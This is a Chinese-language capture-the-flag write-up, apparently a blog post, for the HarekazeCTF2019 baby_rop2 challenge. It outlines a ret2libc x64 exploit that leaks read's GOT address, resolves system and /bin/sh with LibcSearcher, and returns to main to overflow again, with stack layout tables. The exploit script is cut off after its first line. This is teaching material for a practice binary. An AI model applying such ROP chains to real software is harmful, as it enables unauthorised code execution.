[HarekazeCTF2019]baby_rop2
checksec
1 | [*] '/home/zelas/Desktop/pwn/[HarekazeCTF2019]baby_rop2/babyrop2' |
IDA
main()
1 | int __cdecl main(int argc, const char **argv, const char **envp) |
无可疑字符串
无可疑函数
0x02
思路 ret2libc x64
1.利用read()处溢出泄露read_got
2.利用Libcsearcher计算出system()和/bin/sh的地址
3.再次执行main(),再次溢出至system()
s | 0x20 |
---|---|
rbp | 0x8 |
pop_rdi_ret | read_got |
ret | printf() |
printf_ret | main() |
s | 0x20 |
---|---|
rbp | 0x8 |
pop_rdi_ret | /bin/sh |
ret | system() |
sys_ret | 0xdeadbeef |
0x03
exp
1 | from pwn import * |
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果